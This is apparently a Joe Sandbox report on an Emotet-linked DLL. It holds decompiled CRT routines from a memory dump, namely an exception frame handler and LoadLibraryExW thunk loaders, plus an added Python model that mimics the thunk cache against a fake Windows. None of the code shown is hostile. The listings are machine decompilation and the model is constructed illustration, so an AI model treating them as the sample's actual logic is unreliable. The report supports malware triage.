                                                                                                				signed long long _t226;
                                                                                                				long long _t228;
                                                                                                				signed int _t235;
                                                                                                				intOrPtr* _t236;
                                                                                                				intOrPtr* _t237;
                                                                                                				signed long long _t246;
                                                                                                				long long _t267;
                                                                                                				signed int* _t280;
                                                                                                				long long _t281;
                                                                                                				void* _t282;
                                                                                                				void* _t283;
                                                                                                				signed long long _t284;
                                                                                                				long long _t296;
                                                                                                				signed int _t307;
                                                                                                				unsigned long long _t313;
                                                                                                
                                                                                                				_t180 = __esi;
                                                                                                				_t282 = _t283 - 0x28;
                                                                                                				_t284 = _t283 - 0x128;
                                                                                                				_t219 =  *0x80021010; // 0xeaed15642a89
                                                                                                				_t220 = _t219 ^ _t284;
                                                                                                				 *(_t282 + 0x10) = _t220;
                                                                                                				_t280 =  *((intOrPtr*)(_t282 + 0x90));
                                                                                                				_t307 =  *((intOrPtr*)(_t282 + 0xa8));
                                                                                                				 *((long long*)(_t284 + 0x68)) = __r8;
                                                                                                				_t236 = __rcx;
                                                                                                				 *((long long*)(_t284 + 0x78)) = __rdx;
                                                                                                				 *(_t282 - 0x68) = _t307;
                                                                                                				 *((char*)(_t284 + 0x60)) = 0;
                                                                                                				_t281 = __r9;
                                                                                                				_t128 = E0000000118000427C(__ecx, __esi, __rcx, __rdx, __r9, __r9, _t282, _t280, __r9);
                                                                                                				r14d = _t128;
                                                                                                				if (_t128 - 0xffffffff < 0) goto 0x800037f7;
                                                                                                				if (_t128 - _t280[1] >= 0) goto 0x800037f7;
                                                                                                				if ( *_t236 != 0xe06d7363) goto 0x80003474;
                                                                                                				if ( *((intOrPtr*)(_t236 + 0x18)) != 4) goto 0x80003474;
                                                                                                				if ( *((intOrPtr*)(_t236 + 0x20)) - 0x19930520 - 2 > 0) goto 0x80003474;
                                                                                                				if ( *((long long*)(_t236 + 0x30)) != 0) goto 0x80003474;
                                                                                                				E00000001180002D40(_t220);
                                                                                                				if ( *((long long*)(_t220 + 0x20)) == 0) goto 0x80003790;
                                                                                                				E00000001180002D40(_t220);
                                                                                                				_t237 =  *((intOrPtr*)(_t220 + 0x20));
                                                                                                				E00000001180002D40(_t220);
                                                                                                				 *((char*)(_t284 + 0x60)) = 1;
                                                                                                				 *((long long*)(_t284 + 0x68)) =  *((intOrPtr*)(_t220 + 0x28));
                                                                                                				E00000001180002448(_t220,  *((intOrPtr*)(_t237 + 0x38)));
                                                                                                				if ( *_t237 != 0xe06d7363) goto 0x8000342c;
                                                                                                				if ( *((intOrPtr*)(_t237 + 0x18)) != 4) goto 0x8000342c;
                                                                                                				if ( *((intOrPtr*)(_t237 + 0x20)) - 0x19930520 - 2 > 0) goto 0x8000342c;
                                                                                                				if ( *((long long*)(_t237 + 0x30)) == 0) goto 0x800037f7;
                                                                                                				E00000001180002D40(_t220);
                                                                                                				if ( *(_t220 + 0x38) == 0) goto 0x80003474;
                                                                                                				E00000001180002D40(_t220);
                                                                                                				E00000001180002D40(_t220);
                                                                                                				 *(_t220 + 0x38) =  *(_t220 + 0x38) & 0x00000000;
                                                                                                				if (E00000001180004314(_t220, _t237, _t237,  *(_t220 + 0x38), __r9) != 0) goto 0x8000346f;
                                                                                                				if (E00000001180004404(_t220, _t237,  *(_t220 + 0x38), __r9, _t282) == 0) goto 0x800037d4;
                                                                                                				goto 0x800037b0;
                                                                                                				 *((long long*)(_t282 - 0x40)) =  *((intOrPtr*)(__r9 + 8));
                                                                                                				 *(_t282 - 0x48) = _t280;
                                                                                                				if ( *_t237 != 0xe06d7363) goto 0x80003747;
                                                                                                				if ( *((intOrPtr*)(_t237 + 0x18)) != 4) goto 0x80003747;
                                                                                                				if ( *((intOrPtr*)(_t237 + 0x20)) - 0x19930520 - 2 > 0) goto 0x80003747;
                                                                                                				r15d = 0;
                                                                                                				if (_t280[3] - r15d <= 0) goto 0x80003678;
                                                                                                				 *(_t284 + 0x28) =  *(_t282 + 0xa0);
                                                                                                				 *(_t284 + 0x20) = _t280;
                                                                                                				r8d = r14d;
                                                                                                				_t145 = E00000001180002134(_t237, _t282 - 0x28, _t282 - 0x48, __r9, _t282, _t280, __r9, __r10);
                                                                                                				asm("movups xmm0, [ebp-0x28]");
                                                                                                				asm("movdqu [ebp-0x38], xmm0");
                                                                                                				asm("psrldq xmm0, 0x8");
                                                                                                				asm("movd eax, xmm0");
                                                                                                				if (_t145 -  *((intOrPtr*)(_t282 - 0x10)) >= 0) goto 0x80003678;
                                                                                                				_t296 =  *((intOrPtr*)(_t282 - 0x28));
                                                                                                				r13d =  *((intOrPtr*)(_t282 - 0x30));
                                                                                                				 *((long long*)(_t282 - 0x80)) = _t296;
                                                                                                				_t146 = r13d;
                                                                                                				asm("inc ecx");
                                                                                                				 *((intOrPtr*)(_t282 - 0x50)) = __ecx;
                                                                                                				asm("movd eax, xmm0");
                                                                                                				asm("movups [ebp-0x60], xmm0");
                                                                                                				if (_t146 - r14d > 0) goto 0x8000366b;
                                                                                                				_t226 =  *(_t282 - 0x60) >> 0x20;
                                                                                                				if (r14d - _t146 > 0) goto 0x8000366b;
                                                                                                				r12d = r15d;
                                                                                                				_t267 =  *((intOrPtr*)( *((intOrPtr*)( *( *(_t282 - 0x38)) + 0x10)) + ( *( *(_t282 - 0x38)) +  *( *(_t282 - 0x38)) * 4) * 4 +  *((intOrPtr*)(_t296 + 8)) + 0x10)) +  *((intOrPtr*)(__r9 + 8));
                                                                                                				_t313 =  *(_t282 - 0x58) >> 0x20;
                                                                                                				 *((long long*)(_t282 - 0x70)) = _t267;
                                                                                                				if (r15d == 0) goto 0x80003658;
                                                                                                				_t246 = _t226 + _t226 * 4;
                                                                                                				asm("movups xmm0, [edx+ecx*4]");
                                                                                                				asm("movups [ebp-0x8], xmm0");
                                                                                                				_t59 = _t246 * 4; // 0x48ccccc35f40c483
                                                                                                				 *((intOrPtr*)(_t282 + 8)) =  *((intOrPtr*)(_t267 + _t59 + 0x10));
                                                                                                				E0000000118000241C(_t226);
                                                                                                				_t228 = _t226 + 4 +  *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x30)) + 0xc));
                                                                                                				 *((long long*)(_t284 + 0x70)) = _t228;
                                                                                                				E0000000118000241C(_t228);
                                                                                                				_t176 =  *((intOrPtr*)(_t228 +  *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x30)) + 0xc))));
                                                                                                				 *((intOrPtr*)(_t284 + 0x64)) = _t176;
                                                                                                				if (_t176 <= 0) goto 0x800035e8;
                                                                                                				E0000000118000241C(_t228);
                                                                                                				 *((long long*)(_t282 - 0x78)) = _t228 +  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x70))));
                                                                                                				if (E00000001180003A1C(_t180, _t237, _t282 - 8, _t228 +  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x70)))), _t280, __r9,  *((intOrPtr*)(_t237 + 0x30))) != 0) goto 0x800035f9;
                                                                                                				 *((long long*)(_t284 + 0x70)) =  *((long long*)(_t284 + 0x70)) + 4;
                                                                                                				_t154 =  *((intOrPtr*)(_t284 + 0x64)) - 1;
                                                                                                				 *((intOrPtr*)(_t284 + 0x64)) = _t154;
                                                                                                				if (_t154 > 0) goto 0x800035ac;
                                                                                                				r12d = r12d + 1;
                                                                                                				if (r12d == r15d) goto 0x8000365f;
                                                                                                				goto 0x80003565;
                                                                                                				 *((char*)(_t284 + 0x58)) =  *((intOrPtr*)(_t282 + 0x98));
                                                                                                				 *(_t284 + 0x50) =  *((intOrPtr*)(_t284 + 0x60));
                                                                                                				 *((long long*)(_t284 + 0x48)) =  *(_t282 - 0x68);
                                                                                                				 *(_t284 + 0x40) =  *(_t282 + 0xa0);
                                                                                                				 *(_t284 + 0x38) = _t282 - 0x60;
                                                                                                				 *(_t284 + 0x30) =  *((intOrPtr*)(_t282 - 0x78));
                                                                                                				 *(_t284 + 0x28) = _t282 - 8;
                                                                                                				 *(_t284 + 0x20) = _t280;
                                                                                                				E00000001180003254(_t180, _t237, _t237,  *((intOrPtr*)(_t284 + 0x78)),  *((intOrPtr*)(_t284 + 0x68)), _t281);
                                                                                                				goto 0x80003664;
                                                                                                				goto 0x80003668;
                                                                                                				r15d = 0;
                                                                                                				r13d = r13d + 1;
                                                                                                				if (r13d -  *((intOrPtr*)(_t282 - 0x10)) < 0) goto 0x800034fd;
                                                                                                				if (( *_t280 & 0x1fffffff) - 0x19930521 < 0) goto 0x80003784;
                                                                                                				_t209 = _t280[8] - r15d;
                                                                                                				if (_t209 == 0) goto 0x8000369e;
                                                                                                				E00000001180002408(_t282 - 8);
                                                                                                				if (_t209 != 0) goto 0x800036bf;
                                                                                                				if ((_t280[9] >> 0x00000002 & 0x00000001) == 0) goto 0x80003784;
                                                                                                				if (E00000001180001FD8(_t280[9] >> 0x00000002 & 0x00000001, _t282 - 8 + _t280[8], _t281, _t280) != 0) goto 0x80003784;
                                                                                                				if ((_t280[9] >> 0x00000002 & 0x00000001) != 0) goto 0x800037da;
                                                                                                				if (_t280[8] == r15d) goto 0x800036e4;
                                                                                                				E00000001180002408(_t282 - 8 + _t280[8]);
                                                                                                				_t235 = _t280[8];
                                                                                                				goto 0x800036e7;
                                                                                                				if (E00000001180004314(_t235, _t237, _t237, _t313, _t281) != 0) goto 0x80003784;
                                                                                                				E00000001180002068(_t237,  *((intOrPtr*)(_t284 + 0x78)), _t281, _t282, _t280, _t282 - 0x78);
                                                                                                				_t177 =  *((intOrPtr*)(_t282 + 0x98));
                                                                                                				 *(_t284 + 0x50) = _t177;
                                                                                                				_t178 = _t177 | 0xffffffff;
                                                                                                				 *((long long*)(_t284 + 0x48)) = _t281;
                                                                                                				 *(_t284 + 0x40) = _t313;
                                                                                                				 *(_t284 + 0x38) = _t178;
                                                                                                				 *(_t284 + 0x30) = _t178;
                                                                                                				 *(_t284 + 0x28) = _t280;
                                                                                                				 *(_t284 + 0x20) = _t313;
                                                                                                				E00000001180002274( *((intOrPtr*)(_t284 + 0x78)), _t237,  *((intOrPtr*)(_t284 + 0x68)), _t235);
                                                                                                				goto 0x80003784;
                                                                                                				if (_t280[3] <= 0) goto 0x80003784;
                                                                                                				if ( *((char*)(_t282 + 0x98)) != 0) goto 0x800037f7;
                                                                                                				 *(_t284 + 0x38) = _t307;
                                                                                                				 *(_t284 + 0x30) =  *(_t282 + 0xa0);
                                                                                                				 *(_t284 + 0x28) = r14d;
                                                                                                				 *(_t284 + 0x20) = _t280;
                                                                                                				E00000001180003800(_t237, _t237,  *((intOrPtr*)(_t284 + 0x78)), _t313, _t281);
                                                                                                				_t173 = E00000001180002D40(_t235);
                                                                                                				if ( *((long long*)(_t235 + 0x38)) != 0) goto 0x800037f7;
                                                                                                				return E000000011800010B0(_t173, _t178,  *(_t282 + 0x10) ^ _t284);
                                                                                                			}

                                                                                                0x180003328
                                                                                                0x180003335
                                                                                                0x18000333a
                                                                                                0x180003341
                                                                                                0x180003348
                                                                                                0x18000334b
                                                                                                0x18000334f
                                                                                                0x180003359
                                                                                                0x180003363
                                                                                                0x180003368
                                                                                                0x18000336b
                                                                                                0x180003376
                                                                                                0x18000337d
                                                                                                0x180003382
                                                                                                0x180003385
                                                                                                0x18000338a
                                                                                                0x180003390
                                                                                                0x180003399
                                                                                                0x1800033a5
                                                                                                0x1800033af
                                                                                                0x1800033c0
                                                                                                0x1800033cb
                                                                                                0x1800033d1
                                                                                                0x1800033db
                                                                                                0x1800033e1
                                                                                                0x1800033e6
                                                                                                0x1800033ea
                                                                                                0x1800033f3
                                                                                                0x1800033fc
                                                                                                0x180003401
                                                                                                0x18000340c
                                                                                                0x180003412
                                                                                                0x18000341f
                                                                                                0x180003426
                                                                                                0x18000342c
                                                                                                0x180003436
                                                                                                0x180003438
                                                                                                0x180003441
                                                                                                0x18000344c
                                                                                                0x180003458
                                                                                                0x180003464
                                                                                                0x18000346a
                                                                                                0x180003478
                                                                                                0x18000347c
                                                                                                0x180003486
                                                                                                0x180003490
                                                                                                0x1800034a1
                                                                                                0x1800034a7
                                                                                                0x1800034ae
                                                                                                0x1800034be
                                                                                                0x1800034c9
                                                                                                0x1800034ce
                                                                                                0x1800034d1
                                                                                                0x1800034d6
                                                                                                0x1800034da
                                                                                                0x1800034df
                                                                                                0x1800034e4
                                                                                                0x1800034eb
                                                                                                0x1800034f1
                                                                                                0x1800034f5
                                                                                                0x1800034f9
                                                                                                0x180003508
                                                                                                0x180003517
                                                                                                0x180003521
                                                                                                0x180003524
                                                                                                0x180003528
                                                                                                0x18000352f
                                                                                                0x180003539
                                                                                                0x180003540
                                                                                                0x180003546
                                                                                                0x18000354c
                                                                                                0x180003554
                                                                                                0x180003558
                                                                                                0x18000355f
                                                                                                0x180003568
                                                                                                0x18000356c
                                                                                                0x180003570
                                                                                                0x180003574
                                                                                                0x180003578
                                                                                                0x18000357b
                                                                                                0x18000358c
                                                                                                0x18000358f
                                                                                                0x180003594
                                                                                                0x1800035a1
                                                                                                0x1800035a4
                                                                                                0x1800035aa
                                                                                                0x1800035ac
                                                                                                0x1800035c7
                                                                                                0x1800035d2
                                                                                                0x1800035d8
                                                                                                0x1800035de
                                                                                                0x1800035e0
                                                                                                0x1800035e6
                                                                                                0x1800035e8
                                                                                                0x1800035ee
                                                                                                0x1800035f4
                                                                                                0x180003612
                                                                                                0x18000361a
                                                                                                0x180003622
                                                                                                0x18000362d
                                                                                                0x180003635
                                                                                                0x18000363e
                                                                                                0x180003647
                                                                                                0x18000364c
                                                                                                0x180003651
                                                                                                0x180003656
                                                                                                0x18000365d
                                                                                                0x180003668
                                                                                                0x18000366b
                                                                                                0x180003672
                                                                                                0x180003684
                                                                                                0x18000368a
                                                                                                0x18000368e
                                                                                                0x180003690
                                                                                                0x18000369c
                                                                                                0x1800036a6
                                                                                                0x1800036b9
                                                                                                0x1800036c7
                                                                                                0x1800036d1
                                                                                                0x1800036d3
                                                                                                0x1800036db
                                                                                                0x1800036e2
                                                                                                0x1800036f1
                                                                                                0x180003704
                                                                                                0x180003709
                                                                                                0x18000371a
                                                                                                0x18000371e
                                                                                                0x180003721
                                                                                                0x180003726
                                                                                                0x18000372b
                                                                                                0x18000372f
                                                                                                0x180003736
                                                                                                0x18000373b
                                                                                                0x180003740
                                                                                                0x180003745
                                                                                                0x18000374b
                                                                                                0x180003754
                                                                                                0x180003763
                                                                                                0x18000376b
                                                                                                0x180003772
                                                                                                0x18000377a
                                                                                                0x18000377f
                                                                                                0x180003784
                                                                                                0x18000378e
                                                                                                0x1800037af

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                • String ID: csm$csm$csm
                                                                                                • API String ID: 849930591-393685449
                                                                                                • Opcode ID: b6b7f02adf660401896063c6a860fb7c8eea0d446ae07e01c980b744b2235902
                                                                                                • Instruction ID: 68369fba8b053f101f7a0a57f2a328d7db6ec17b1fffbc4fe0a5b608d0144455
                                                                                                • Opcode Fuzzy Hash: b6b7f02adf660401896063c6a860fb7c8eea0d446ae07e01c980b744b2235902
                                                                                                • Instruction Fuzzy Hash: C0E1B272604B888AEBA6DF66D4423DD77A4F749BC8F008116FE8957B96CF34D698C700
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 77%
                                                                                                			E0000000118000A3DC(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
                                                                                                				void* _t35;
                                                                                                				signed long long _t56;
                                                                                                				intOrPtr _t60;
                                                                                                				void* _t71;
                                                                                                				signed long long _t72;
                                                                                                				long long _t78;
                                                                                                				void* _t82;
                                                                                                				signed long long _t88;
                                                                                                				signed long long _t89;
                                                                                                				signed long long _t90;
                                                                                                				WCHAR* _t91;
                                                                                                				long _t94;
                                                                                                				void* _t97;
                                                                                                				WCHAR* _t102;
                                                                                                
                                                                                                				 *((long long*)(_t82 + 8)) = __rbx;
                                                                                                				 *((long long*)(_t82 + 0x10)) = _t78;
                                                                                                				 *((long long*)(_t82 + 0x18)) = __rsi;
                                                                                                				r15d = __ecx;
                                                                                                				_t72 = _t71 | 0xffffffff;
                                                                                                				_t89 =  *0x80021010; // 0xeaed15642a89
                                                                                                				_t88 =  *(0x180000000 + 0x226f0 + _t102 * 8) ^ _t89;
                                                                                                				asm("dec ecx");
                                                                                                				if (_t88 == _t72) goto 0x8000a51f;
                                                                                                				if (_t88 == 0) goto 0x8000a441;
                                                                                                				_t56 = _t88;
                                                                                                				goto 0x8000a521;
                                                                                                				if (__r8 == __r9) goto 0x8000a504;
                                                                                                				_t60 =  *((intOrPtr*)(0x180000000 + 0x22640 + __rsi * 8));
                                                                                                				if (_t60 == 0) goto 0x8000a469;
                                                                                                				if (_t60 != _t72) goto 0x8000a55e;
                                                                                                				goto 0x8000a4f0;
                                                                                                				r8d = 0x800;
                                                                                                				LoadLibraryExW(_t102, _t97, _t94);
                                                                                                				if (_t56 != 0) goto 0x8000a53e;
                                                                                                				if (GetLastError() != 0x57) goto 0x8000a4de;
                                                                                                				_t14 = _t56 - 0x50; // -80
                                                                                                				_t35 = _t14;
                                                                                                				r8d = _t35;
                                                                                                				if (E00000001180007070(__r8) == 0) goto 0x8000a4de;
                                                                                                				r8d = _t35;
                                                                                                				if (E00000001180007070(__r8) == 0) goto 0x8000a4de;
                                                                                                				r8d = 0;
                                                                                                				LoadLibraryExW(_t91, _t71);
                                                                                                				if (_t56 != 0) goto 0x8000a53e;
                                                                                                				 *((intOrPtr*)(0x180000000 + 0x22640 + __rsi * 8)) = _t72;
                                                                                                				if (__r8 + 4 != __r9) goto 0x8000a44a;
                                                                                                				_t90 =  *0x80021010; // 0xeaed15642a89
                                                                                                				asm("dec eax");
                                                                                                				 *(0x180000000 + 0x226f0 + _t102 * 8) = _t72 ^ _t90;
                                                                                                				return 0;
			}

Instruction addresses covered by the listing above (the decompiler's address column, which extraction separated from its code lines):
0x18000a3dc 0x18000a3e1 0x18000a3e6 0x18000a3f8 0x18000a402 0x18000a418 0x18000a41f 0x18000a428
0x18000a42e 0x18000a437 0x18000a439 0x18000a43c 0x18000a444 0x18000a44d 0x18000a459 0x18000a45e
0x18000a464 0x18000a476 0x18000a47c 0x18000a488 0x18000a497 0x18000a499 0x18000a499 0x18000a49f
0x18000a4b0 0x18000a4b2 0x18000a4c6 0x18000a4c8 0x18000a4d0 0x18000a4dc 0x18000a4e8 0x18000a4f7
0x18000a4fd 0x18000a511 0x18000a517 0x18000a53d

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressFreeLibraryProc
                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                • API String ID: 3013587201-537541572
                                                                                                • Opcode ID: 4973cf4a17c5a6c0ea837db478b6f4f53bca8011a61d94df8f11c1c7fa6ad517
                                                                                                • Instruction ID: 4cb29e05f73c92bcfdeebd25cdbb701ff5eb44b215489781f60aaecc25d2491e
                                                                                                • Opcode Fuzzy Hash: 4973cf4a17c5a6c0ea837db478b6f4f53bca8011a61d94df8f11c1c7fa6ad517
                                                                                                • Instruction Fuzzy Hash: ED41D032715A0856FBA7CB16AC047D53391B78EBE0F09C225BD1D47798EE38C64D8300
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%
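The routine E0000000118000A3DC above is worth recognising on sight so that its LoadLibraryExW / GetProcAddress calls are not mistaken for the sample's own import resolver. Its shape (the "api-ms-" and "ext-ms-" strings in this function's string list, LoadLibraryExW with r8d = 0x800 which is LOAD_LIBRARY_SEARCH_SYSTEM32, the GetLastError() == 0x57 / ERROR_INVALID_PARAMETER retry, a module table at 0x22640 with -1 meaning "tried and failed", and a function-pointer table at 0x226f0 XOR-encoded with the security cookie at 0x80021010) matches the statically linked MSVC CRT's winapi thunk loader (try_get_module / try_get_function in the CRT sources shipped with Visual Studio). The Python below is an added model of that logic for this report, not code from the sample or from Joe Sandbox. It replaces Windows with a constructed fake (FakeWindows, CrtThunkCache, demo and the DLL/export names in it are all made up for the illustration), and it reads the two calls to E00000001180007070 as the "api-ms-" / "ext-ms-" prefix comparisons, which is an interpretation of the listing rather than something the report states.

```python
"""Model of the CRT thunk cache seen in the decompiled routine E0000000118000A3DC.
Added illustration for this report; not code from the sample or from Joe Sandbox.
Windows is replaced by a constructed fake so the model runs offline."""

LOAD_LIBRARY_SEARCH_SYSTEM32 = 0x800   # the r8d = 0x800 passed to LoadLibraryExW
ERROR_INVALID_PARAMETER = 0x57         # the GetLastError() == 0x57 test in the listing
ERROR_MOD_NOT_FOUND = 0x7E             # any other failure: no fallback, cache the miss
FAILED = (1 << 64) - 1                 # the -1 sentinel (_t72 = ... | 0xffffffff)


def is_api_set(name):
    """API-set DLLs never get the legacy-search fallback; these are the two
    prefixes that appear in the function's string list."""
    low = name.lower()
    return low.startswith("api-ms-") or low.startswith("ext-ms-")


class FakeWindows:
    """Constructed stand-in for LoadLibraryExW / GetLastError / GetProcAddress.
    `system32` and `search_path` map DLL name -> {export name: address}; the
    latter models the application directory / CWD, the hijackable locations."""

    def __init__(self, system32, search_path, supports_search_flags=True):
        self.system32 = system32
        self.search_path = search_path
        self.supports_search_flags = supports_search_flags
        self.last_error = 0
        self.loads = []                  # (name, flags) log, inspected by the tests
        self._handles = {}
        self._exports = {}

    def load_library_ex(self, name, flags):
        self.loads.append((name, flags))
        if flags & LOAD_LIBRARY_SEARCH_SYSTEM32:
            if not self.supports_search_flags:   # old loader: flag rejected as 0x57
                self.last_error = ERROR_INVALID_PARAMETER
                return 0
            sources = [self.system32]            # planted copies elsewhere are ignored
        else:
            sources = [self.search_path, self.system32]   # legacy order: app dir first
        for src in sources:
            if name in src:
                if name not in self._handles:
                    self._handles[name] = len(self._handles) + 1
                    self._exports[self._handles[name]] = src[name]
                return self._handles[name]
        self.last_error = ERROR_MOD_NOT_FOUND
        return 0

    def get_proc_address(self, handle, func):
        return self._exports[handle].get(func, 0)


class CrtThunkCache:
    """The two tables the routine reads: module handles (0x22640 equivalent,
    0 = untried, FAILED = do not retry) and encoded function pointers
    (0x226f0 equivalent, stored as pointer XOR cookie)."""

    def __init__(self, win, module_names, cookie):
        self.win = win
        self.module_names = module_names
        self.cookie = cookie
        self.modules = [0] * len(module_names)
        self.functions = {}                        # func_id -> encoded pointer

    def try_get_module(self, idx):
        cached = self.modules[idx]
        if cached == FAILED:
            return 0                               # known failure, no second attempt
        if cached:
            return cached
        name = self.module_names[idx]
        h = self.win.load_library_ex(name, LOAD_LIBRARY_SEARCH_SYSTEM32)
        if (h == 0 and self.win.last_error == ERROR_INVALID_PARAMETER
                and not is_api_set(name)):
            h = self.win.load_library_ex(name, 0)  # legacy fallback, never for API sets
        self.modules[idx] = h if h else FAILED
        return h

    def try_get_function(self, func_id, func_name, candidates):
        decoded = self.functions.get(func_id, self.cookie) ^ self.cookie
        if decoded == FAILED:
            return 0
        if decoded:
            return decoded
        for idx in candidates:                     # the __r8 .. __r9 walk, stride 4
            h = self.try_get_module(idx)
            if not h:
                continue
            ptr = self.win.get_proc_address(h, func_name)
            if ptr:
                self.functions[func_id] = ptr ^ self.cookie
                return ptr
        self.functions[func_id] = FAILED ^ self.cookie
        return 0


def demo(legacy_os=False):
    """Constructed scenario: a planted api-ms-* DLL in the search path must lose
    to the system32 copy, and a failed load must not be retried."""
    win = FakeWindows(
        system32={"kernel32.dll": {"FlsAlloc": 0x7FF800001100},
                  "api-ms-win-core-fibers-l1-1-1.dll": {"FlsAlloc": 0x7FF800002000}},
        search_path={"api-ms-win-core-fibers-l1-1-1.dll": {"FlsAlloc": 0x41414141},
                     "version.dll": {"GetFileVersionInfoW": 0x7FF800003000}},
        supports_search_flags=not legacy_os)
    names = ["api-ms-win-core-fibers-l1-1-1.dll", "kernel32.dll", "version.dll"]
    cache = CrtThunkCache(win, names, cookie=0xEAED15642A89)   # value from the listing
    fls = cache.try_get_function(0, "FlsAlloc", [0, 1])
    fls_again = cache.try_get_function(0, "FlsAlloc", [0, 1])
    ver = cache.try_get_function(1, "GetFileVersionInfoW", [2])
    missing = cache.try_get_function(2, "NoSuchExport", [1])
    return {"fls": fls, "fls_again": fls_again, "ver": ver, "missing": missing,
            "loads": list(win.loads), "modules": list(cache.modules)}
```

On a loader that honours the flag, the planted copy of the api-ms-* DLL in the search path is never consulted, and a module that fails once is marked with the sentinel so later thunks skip it. On a legacy loader the API-set name is abandoned outright while ordinary names fall back to the unrestricted search. When triaging a report like this one, a function with this signature is CRT plumbing resolving the runtime's own imports; Emotet's own API resolution, if any, has to be looked for elsewhere in the dump.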

                                                                                                C-Code - Quality: 50%
                                                                                                			E000000011800045BC(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
                                                                                                				intOrPtr _t61;
                                                                                                				intOrPtr _t65;
                                                                                                				intOrPtr _t67;
                                                                                                				intOrPtr _t68;
                                                                                                				struct HINSTANCE__* _t81;
                                                                                                				long long _t85;
                                                                                                				void* _t89;
                                                                                                				struct HINSTANCE__* _t94;
                                                                                                				long _t97;
                                                                                                				void* _t100;
                                                                                                				signed long long _t101;
                                                                                                				WCHAR* _t104;
                                                                                                
                                                                                                				 *((long long*)(_t89 + 8)) = __rbx;
                                                                                                				 *((long long*)(_t89 + 0x10)) = _t85;
                                                                                                				 *((long long*)(_t89 + 0x18)) = __rsi;
                                                                                                				_t101 = _t100 | 0xffffffff;
                                                                                                				_t61 =  *((intOrPtr*)(0x180000000 + 0x22208 + _t81 * 8));
                                                                                                				if (_t61 == _t101) goto 0x800046eb;
                                                                                                				if (_t61 != 0) goto 0x800046ed;
                                                                                                				if (__r8 == __r9) goto 0x800046e3;
                                                                                                				_t67 =  *((intOrPtr*)(0x180000000 + 0x221f0 + __rsi * 8));
                                                                                                				if (_t67 == 0) goto 0x8000462e;
                                                                                                				if (_t67 != _t101) goto 0x800046c5;
                                                                                                				goto 0x80004699;
                                                                                                				r8d = 0x800;
                                                                                                				LoadLibraryExW(_t104, _t100, _t97);
                                                                                                				_t68 = _t61;
                                                                                                				if (_t61 != 0) goto 0x800046a5;
                                                                                                				if (GetLastError() != 0x57) goto 0x80004687;
                                                                                                				_t14 = _t68 + 7; // 0x7
                                                                                                				r8d = _t14;
                                                                                                				if (E00000001180007070(__r8) == 0) goto 0x80004687;
                                                                                                				r8d = 0;
                                                                                                				LoadLibraryExW(??, ??, ??);
                                                                                                				if (_t61 != 0) goto 0x800046a5;
                                                                                                				 *((intOrPtr*)(0x180000000 + 0x221f0 + __rsi * 8)) = _t101;
                                                                                                				goto 0x8000460c;
                                                                                                				_t21 = 0x180000000 + 0x221f0 + __rsi * 8;
                                                                                                				_t65 =  *_t21;
                                                                                                				 *_t21 = _t61;
                                                                                                				if (_t65 == 0) goto 0x800046c5;
                                                                                                				FreeLibrary(_t94);
                                                                                                				GetProcAddress(_t81);
                                                                                                				if (_t65 == 0) goto 0x800046e3;
                                                                                                				 *((intOrPtr*)(0x180000000 + 0x22208 + _t81 * 8)) = _t65;
                                                                                                				goto 0x800046ed;
                                                                                                				 *((intOrPtr*)(0x180000000 + 0x22208 + _t81 * 8)) = _t101;
                                                                                                				return 0;
                                                                                                			}

                                                                                                APIs
                                                                                                • LoadLibraryExW.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 0000000180004641
                                                                                                • GetLastError.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 000000018000464F
                                                                                                • LoadLibraryExW.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 0000000180004679
                                                                                                • FreeLibrary.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 00000001800046BF
                                                                                                • GetProcAddress.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 00000001800046CB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmp
